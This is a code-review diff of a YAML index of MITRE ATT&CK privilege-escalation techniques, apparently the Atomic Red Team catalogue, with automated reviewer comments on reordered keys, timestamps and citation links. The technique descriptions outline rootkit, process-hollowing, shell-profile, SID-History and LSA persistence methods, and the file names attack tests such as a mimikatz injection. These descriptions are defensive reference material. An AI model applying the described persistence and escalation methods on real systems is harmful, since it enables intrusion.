- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests:
- name: Linux - Load Kernel Module via insmod
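Review bot: almost all of this roughly 140-line hunk is key reordering of the T1547.006 block (`modified`, `name` and `description` moved to the top, each reference's `url` moved after its `description`, the `x_mitre_*` fields regrouped); the substantive changes are `modified` 2022-05-11 to 2024-09-12, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, the iDefense reference switching to https with `Retrieved September 12, 2024`, and the usual `spec_version` removal. State in the PR description that the emitter's key order changed, and confirm the new order is deterministic so the next regeneration does not produce another diff of this size for unchanged data.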
@@ -44756,7 +45070,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -44782,12 +45096,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
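Review bot: the KernelCallbackTable block loses `x_mitre_attack_spec_version: 2.1.0` along with `spec_version`, and unlike T1546.001 (where the key is removed in one hunk and re-added as 3.2.0 further down) nothing visible here re-adds it, while `x_mitre_modified_by_ref` stays. Either the re-add is outside the shown context or the regenerated object has no attack spec version at all; please confirm which.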
@@ -44865,9 +45177,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests:
- name: Create Systemd Service and Timer
@@ -45045,7 +45356,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -45119,11 +45429,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -45140,7 +45449,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -45150,7 +45458,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -45159,19 +45467,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
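Review bot: `Azure AD`, `Office 365` and `Google Workspace` leave the T1078 platform list and `Office Suite` / `Identity Provider` replace them, so any per-platform index that is built by string-matching these platform names (for example a Google Workspace or Office 365 index) will silently stop listing T1078 unless the generator maps the old names onto the new ones. Confirm the platform indexes were regenerated from this platform list rather than hand-edited, and that the 2.6 -> 2.7 `x_mitre_version` bump matches the upstream ATT&CK object.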
@@ -45219,11 +45525,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -45291,18 +45598,17 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests:
- name: Process Hollowing using PowerShell
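Review bot: the `Leitch Hollowing` reference now points at a third-party mirror (new.dc414.org) instead of the original autosectools.com PDF, while the dead bencane.com link elsewhere in this patch is replaced with a web.archive.org snapshot of the original URL. Prefer the same approach here, an archived copy of http://www.autosectools.com/process-hollowing.pdf, so the citation keeps pointing at its original source, or say in the description that the new URL is a mirror.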
@@ -45430,7 +45736,7 @@ privilege-escalation:
Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
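Review bot: the T1068 `modified` value moves backwards, from 2023-10-31 to 2023-04-07, and its `x_mitre_attack_spec_version` stays at 3.1.0; the same backwards move happens for T1134.005, T1548.004, T1547.002, T1546.015, T1574.009, T1037.005, T1037.003, T1546.010, T1543.001, Proc Memory, T1134, T1055.005, T1547.007 and T1574.002 in later hunks. The old values share the suffix `14:00:00.188Z` across unrelated objects, which looks like a synthetic bulk timestamp rather than an upstream value; if that is the explanation, say so in the commit message so the backwards move is not mistaken for the generator having been pointed at a stale ATT&CK bundle.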
@@ -45493,11 +45799,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -45550,8 +45855,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -45599,7 +45904,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests:
- name: Persistence with Custom AutodialDLL
@@ -45815,73 +46119,7 @@ privilege-escalation:
elevation_required: true
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
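Review bot: nearly all of these 73 removed lines reappear verbatim later in the same T1546.004 object (the `@@ -45950` hunk), so this is a key reorder rather than a content change, and it hides the few real edits to the object. Have the generator emit mapping keys in a stable order (sorted, or the upstream STIX order) so future regenerations produce diffs that show only semantic changes.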
@@ -45929,6 +46167,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -45939,9 +46181,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -45950,8 +46196,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
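Review bot: the substantive changes buried in this reorder are the `bencane blog bashrc` URL moving to a web.archive.org snapshot with a new retrieval date, the added `revoked: false`, and the 2.1.0 -> 3.2.0 `x_mitre_attack_spec_version` bump; the archive link is the right fix for a dead source (the `20220316` snapshot date in the URL predating the 2024 retrieval date is fine). Call these three out in the commit message, since a reader of the hunk otherwise sees only moved lines.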
@@ -46146,7 +46451,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -46171,8 +46476,6 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests:
- name: Injection SID-History with mimikatz
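Review bot: T1134.005 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` here with nothing added in their place, while most other objects in this patch receive `x_mitre_attack_spec_version: 3.2.0` (and `x_mitre_modified_by_ref`) in exchange. Unless the upstream object genuinely lacks the field, the generator should emit it for every technique so consumers can rely on it being present.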
@@ -46225,7 +46528,7 @@ privilege-escalation:
'
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -46305,7 +46608,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -46341,7 +46643,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -46364,7 +46666,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests:
- name: Authentication Package
@@ -46387,7 +46688,7 @@ privilege-escalation:
elevation_required: true
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -46465,7 +46766,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests:
- name: COM Hijacking - InprocServer32
@@ -46608,7 +46908,7 @@ privilege-escalation:
name: powershell
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -46669,7 +46969,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests:
- name: Execution of program.exe as service with unquoted service path
@@ -46741,7 +47040,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
